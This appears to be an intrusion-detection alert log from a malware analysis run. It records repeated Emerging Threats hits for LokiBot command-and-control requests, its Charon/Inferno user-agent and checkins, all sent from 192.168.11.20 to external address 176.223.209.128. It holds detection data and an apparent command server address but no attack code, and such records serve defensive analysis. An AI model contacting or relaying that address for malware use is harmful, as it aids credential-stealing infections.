                                              11/25/21-10:54:38.499060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15061980192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.499060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5061980192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.499060TCP2025381ET TROJAN LokiBot Checkin5061980192.168.11.20176.223.209.128
                                              11/25/21-10:54:38.499060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25061980192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.022864TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062080192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.022864TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062080192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.022864TCP2025381ET TROJAN LokiBot Checkin5062080192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.022864TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062080192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.521845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062180192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.521845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062180192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.521845TCP2025381ET TROJAN LokiBot Checkin5062180192.168.11.20176.223.209.128
                                              11/25/21-10:54:39.521845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062180192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.029450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062280192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.029450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062280192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.029450TCP2025381ET TROJAN LokiBot Checkin5062280192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.029450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062280192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.556828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062380192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.556828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062380192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.556828TCP2025381ET TROJAN LokiBot Checkin5062380192.168.11.20176.223.209.128
                                              11/25/21-10:54:40.556828TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062380192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.063492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062480192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.063492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062480192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.063492TCP2025381ET TROJAN LokiBot Checkin5062480192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.063492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062480192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.563964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062580192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.563964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062580192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.563964TCP2025381ET TROJAN LokiBot Checkin5062580192.168.11.20176.223.209.128
                                              11/25/21-10:54:41.563964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062580192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.044572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062680192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.044572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062680192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.044572TCP2025381ET TROJAN LokiBot Checkin5062680192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.044572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062680192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.547776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062780192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.547776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062780192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.547776TCP2025381ET TROJAN LokiBot Checkin5062780192.168.11.20176.223.209.128
                                              11/25/21-10:54:42.547776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062780192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.023086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062880192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.023086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062880192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.023086TCP2025381ET TROJAN LokiBot Checkin5062880192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.023086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062880192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.528950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15062980192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.528950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5062980192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.528950TCP2025381ET TROJAN LokiBot Checkin5062980192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.528950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25062980192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.982401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063080192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.982401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063080192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.982401TCP2025381ET TROJAN LokiBot Checkin5063080192.168.11.20176.223.209.128
                                              11/25/21-10:54:43.982401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063080192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.482333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063180192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.482333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063180192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.482333TCP2025381ET TROJAN LokiBot Checkin5063180192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.482333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063180192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.983291TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063280192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.983291TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063280192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.983291TCP2025381ET TROJAN LokiBot Checkin5063280192.168.11.20176.223.209.128
                                              11/25/21-10:54:44.983291TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063280192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.439633TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063380192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.439633TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063380192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.439633TCP2025381ET TROJAN LokiBot Checkin5063380192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.439633TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063380192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.952049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063480192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.952049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063480192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.952049TCP2025381ET TROJAN LokiBot Checkin5063480192.168.11.20176.223.209.128
                                              11/25/21-10:54:45.952049TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063480192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.455302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063580192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.455302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063580192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.455302TCP2025381ET TROJAN LokiBot Checkin5063580192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.455302TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063580192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.977531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063680192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.977531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063680192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.977531TCP2025381ET TROJAN LokiBot Checkin5063680192.168.11.20176.223.209.128
                                              11/25/21-10:54:46.977531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063680192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.479979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063780192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.479979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063780192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.479979TCP2025381ET TROJAN LokiBot Checkin5063780192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.479979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063780192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.949235TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063880192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.949235TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063880192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.949235TCP2025381ET TROJAN LokiBot Checkin5063880192.168.11.20176.223.209.128
                                              11/25/21-10:54:47.949235TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063880192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.460000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15063980192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.460000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5063980192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.460000TCP2025381ET TROJAN LokiBot Checkin5063980192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.460000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25063980192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.980264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064080192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.980264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064080192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.980264TCP2025381ET TROJAN LokiBot Checkin5064080192.168.11.20176.223.209.128
                                              11/25/21-10:54:48.980264TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064080192.168.11.20176.223.209.128
                                              11/25/21-10:54:49.491342TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064180192.168.11.20176.223.209.128
                                              11/25/21-10:54:49.491342TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064180192.168.11.20176.223.209.128
                                              11/25/21-10:54:49.491342TCP2025381ET TROJAN LokiBot Checkin5064180192.168.11.20176.223.209.128
                                              11/25/21-10:54:49.491342TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064180192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.009142TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064280192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.009142TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064280192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.009142TCP2025381ET TROJAN LokiBot Checkin5064280192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.009142TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064280192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.524009TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064380192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.524009TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064380192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.524009TCP2025381ET TROJAN LokiBot Checkin5064380192.168.11.20176.223.209.128
                                              11/25/21-10:54:50.524009TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064380192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.017243TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064480192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.017243TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064480192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.017243TCP2025381ET TROJAN LokiBot Checkin5064480192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.017243TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064480192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.521089TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064580192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.521089TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064580192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.521089TCP2025381ET TROJAN LokiBot Checkin5064580192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.521089TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064580192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.987314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064680192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.987314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064680192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.987314TCP2025381ET TROJAN LokiBot Checkin5064680192.168.11.20176.223.209.128
                                              11/25/21-10:54:51.987314TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064680192.168.11.20176.223.209.128
                                              11/25/21-10:54:52.546072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064780192.168.11.20176.223.209.128
                                              11/25/21-10:54:52.546072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064780192.168.11.20176.223.209.128
                                              11/25/21-10:54:52.546072TCP2025381ET TROJAN LokiBot Checkin5064780192.168.11.20176.223.209.128
                                              11/25/21-10:54:52.546072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064780192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.019558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064880192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.019558TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064880192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.019558TCP2025381ET TROJAN LokiBot Checkin5064880192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.019558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064880192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.534335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15064980192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.534335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5064980192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.534335TCP2025381ET TROJAN LokiBot Checkin5064980192.168.11.20176.223.209.128
                                              11/25/21-10:54:53.534335TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25064980192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.011787TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065080192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.011787TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065080192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.011787TCP2025381ET TROJAN LokiBot Checkin5065080192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.011787TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065080192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.518849TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065180192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.518849TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065180192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.518849TCP2025381ET TROJAN LokiBot Checkin5065180192.168.11.20176.223.209.128
                                              11/25/21-10:54:54.518849TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065180192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.034068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065280192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.034068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065280192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.034068TCP2025381ET TROJAN LokiBot Checkin5065280192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.034068TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065280192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.547945TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065380192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.547945TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065380192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.547945TCP2025381ET TROJAN LokiBot Checkin5065380192.168.11.20176.223.209.128
                                              11/25/21-10:54:55.547945TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065380192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.056137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065480192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.056137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065480192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.056137TCP2025381ET TROJAN LokiBot Checkin5065480192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.056137TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065480192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.566470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065580192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.566470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065580192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.566470TCP2025381ET TROJAN LokiBot Checkin5065580192.168.11.20176.223.209.128
                                              11/25/21-10:54:56.566470TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065580192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.072320TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065680192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.072320TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065680192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.072320TCP2025381ET TROJAN LokiBot Checkin5065680192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.072320TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065680192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.565910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065780192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.565910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065780192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.565910TCP2025381ET TROJAN LokiBot Checkin5065780192.168.11.20176.223.209.128
                                              11/25/21-10:54:57.565910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065780192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.031226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065880192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.031226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065880192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.031226TCP2025381ET TROJAN LokiBot Checkin5065880192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.031226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065880192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.463608TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15065980192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.463608TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5065980192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.463608TCP2025381ET TROJAN LokiBot Checkin5065980192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.463608TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25065980192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.966616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066080192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.966616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066080192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.966616TCP2025381ET TROJAN LokiBot Checkin5066080192.168.11.20176.223.209.128
                                              11/25/21-10:54:58.966616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066080192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.471626TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066180192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.471626TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066180192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.471626TCP2025381ET TROJAN LokiBot Checkin5066180192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.471626TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066180192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.978509TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066280192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.978509TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066280192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.978509TCP2025381ET TROJAN LokiBot Checkin5066280192.168.11.20176.223.209.128
                                              11/25/21-10:54:59.978509TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066280192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.435673TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066380192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.435673TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066380192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.435673TCP2025381ET TROJAN LokiBot Checkin5066380192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.435673TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066380192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.937404TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066480192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.937404TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066480192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.937404TCP2025381ET TROJAN LokiBot Checkin5066480192.168.11.20176.223.209.128
                                              11/25/21-10:55:00.937404TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066480192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.418915TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066580192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.418915TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066580192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.418915TCP2025381ET TROJAN LokiBot Checkin5066580192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.418915TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066580192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.928401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066680192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.928401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066680192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.928401TCP2025381ET TROJAN LokiBot Checkin5066680192.168.11.20176.223.209.128
                                              11/25/21-10:55:01.928401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066680192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.442047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066780192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.442047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066780192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.442047TCP2025381ET TROJAN LokiBot Checkin5066780192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.442047TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066780192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.979042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066880192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.979042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066880192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.979042TCP2025381ET TROJAN LokiBot Checkin5066880192.168.11.20176.223.209.128
                                              11/25/21-10:55:02.979042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066880192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.513245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15066980192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.513245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5066980192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.513245TCP2025381ET TROJAN LokiBot Checkin5066980192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.513245TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25066980192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.981457TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067080192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.981457TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067080192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.981457TCP2025381ET TROJAN LokiBot Checkin5067080192.168.11.20176.223.209.128
                                              11/25/21-10:55:03.981457TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067080192.168.11.20176.223.209.128
                                              11/25/21-10:55:04.538402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067180192.168.11.20176.223.209.128
                                              11/25/21-10:55:04.538402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067180192.168.11.20176.223.209.128
                                              11/25/21-10:55:04.538402TCP2025381ET TROJAN LokiBot Checkin5067180192.168.11.20176.223.209.128
                                              11/25/21-10:55:04.538402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067180192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.052795TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067280192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.052795TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067280192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.052795TCP2025381ET TROJAN LokiBot Checkin5067280192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.052795TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067280192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.569177TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067380192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.569177TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067380192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.569177TCP2025381ET TROJAN LokiBot Checkin5067380192.168.11.20176.223.209.128
                                              11/25/21-10:55:05.569177TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067380192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.082836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067480192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.082836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067480192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.082836TCP2025381ET TROJAN LokiBot Checkin5067480192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.082836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067480192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.598789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067580192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.598789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067580192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.598789TCP2025381ET TROJAN LokiBot Checkin5067580192.168.11.20176.223.209.128
                                              11/25/21-10:55:06.598789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067580192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.053125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067680192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.053125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5067680192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.053125TCP2025381ET TROJAN LokiBot Checkin5067680192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.053125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25067680192.168.11.20176.223.209.128
                                              11/25/21-10:55:07.557350TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15067780192.168.11.20176.223.209.128
